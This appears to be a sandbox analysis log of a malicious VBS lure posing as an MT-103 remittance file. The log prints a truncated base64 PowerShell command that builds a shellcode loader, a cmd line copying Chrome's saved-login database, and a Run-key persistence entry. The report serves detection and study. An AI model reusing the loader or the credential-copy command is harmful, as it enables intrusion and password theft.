Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99B00 NtSetValueKey,	23_2_1EC99B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC9A710 NtOpenProcessToken,	23_2_1EC9A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99730 NtQueryVirtualMemory,	23_2_1EC99730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC998A0 NtWriteVirtualMemory,	23_2_1EC998A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC9B040 NtSuspendThread,	23_2_1EC9B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99820 NtEnumerateKey,	23_2_1EC99820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC999D0 NtCreateProcessEx,	23_2_1EC999D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC995D0 NtClose,	23_2_1EC995D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC995F0 NtQueryInformationFile,	23_2_1EC995F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99950 NtQueueApcThread,	23_2_1EC99950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99560 NtWriteFile,	23_2_1EC99560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99520 NtWaitForSingleObject,	23_2_1EC99520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC9AD30 NtSetContextThread,	23_2_1EC9AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469B00 NtSetValueKey,LdrInitializeThunk,	26_2_03469B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469A50 NtCreateFile,LdrInitializeThunk,	26_2_03469A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469910 NtAdjustPrivilegesToken,LdrInitializeThunk,	26_2_03469910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034699A0 NtCreateSection,LdrInitializeThunk,	26_2_034699A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469840 NtDelayExecution,LdrInitializeThunk,	26_2_03469840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469860 NtQuerySystemInformation,LdrInitializeThunk,	26_2_03469860
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469770 NtSetInformationFile,LdrInitializeThunk,	26_2_03469770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469710 NtQueryInformationToken,LdrInitializeThunk,	26_2_03469710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469FE0 NtCreateMutant,LdrInitializeThunk,	26_2_03469FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469780 NtMapViewOfSection,LdrInitializeThunk,	26_2_03469780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469650 NtQueryValueKey,LdrInitializeThunk,	26_2_03469650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469660 NtAllocateVirtualMemory,LdrInitializeThunk,	26_2_03469660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469610 NtEnumerateValueKey,LdrInitializeThunk,	26_2_03469610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034696D0 NtCreateKey,LdrInitializeThunk,	26_2_034696D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034696E0 NtFreeVirtualMemory,LdrInitializeThunk,	26_2_034696E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469540 NtReadFile,LdrInitializeThunk,	26_2_03469540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469560 NtWriteFile,LdrInitializeThunk,	26_2_03469560
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034695D0 NtClose,LdrInitializeThunk,	26_2_034695D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0346A3B0 NtGetContextThread,	26_2_0346A3B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469A00 NtProtectVirtualMemory,	26_2_03469A00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469A10 NtQuerySection,	26_2_03469A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469A20 NtResumeThread,	26_2_03469A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469A80 NtOpenDirectoryObject,	26_2_03469A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469950 NtQueueApcThread,	26_2_03469950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034699D0 NtCreateProcessEx,	26_2_034699D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0346B040 NtSuspendThread,	26_2_0346B040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469820 NtEnumerateKey,	26_2_03469820
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034698F0 NtReadVirtualMemory,	26_2_034698F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034698A0 NtWriteVirtualMemory,	26_2_034698A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469760 NtOpenProcess,	26_2_03469760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0346A770 NtOpenThread,	26_2_0346A770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0346A710 NtOpenProcessToken,	26_2_0346A710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469730 NtQueryVirtualMemory,	26_2_03469730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034697A0 NtUnmapViewOfSection,	26_2_034697A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469670 NtQueryInformationProcess,	26_2_03469670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03469520 NtWaitForSingleObject,	26_2_03469520
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0346AD30 NtSetContextThread,	26_2_0346AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034695F0 NtQueryInformationFile,	26_2_034695F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2A360 NtCreateFile,	26_2_02A2A360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2A490 NtClose,	26_2_02A2A490
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2A410 NtReadFile,	26_2_02A2A410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2A540 NtAllocateVirtualMemory,	26_2_02A2A540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2A35D NtCreateFile,	26_2_02A2A35D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2A48A NtClose,	26_2_02A2A48A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220124

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Remittance Information (MT-103).vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_01

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035AB910 push esp; retf	4_2_035AB911
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035A4DBD push eax; ret	4_2_035A4DC3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1ECAD0D1 push ecx; ret	23_2_1ECAD0E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0347D0D1 push ecx; ret	26_2_0347D0E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A163D7 push 00000019h; ret	26_2_02A163DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2C883 push 00000038h; retf	26_2_02A2C88F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2A842 push edx; retf	26_2_02A2A843
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A29FB6 push es; iretd	26_2_02A29FBD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2D4B5 push eax; ret	26_2_02A2D508

Source: C:\Windows\SysWOW64\svchost.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IB1XSLUHG4			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IB1XSLUHG4			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
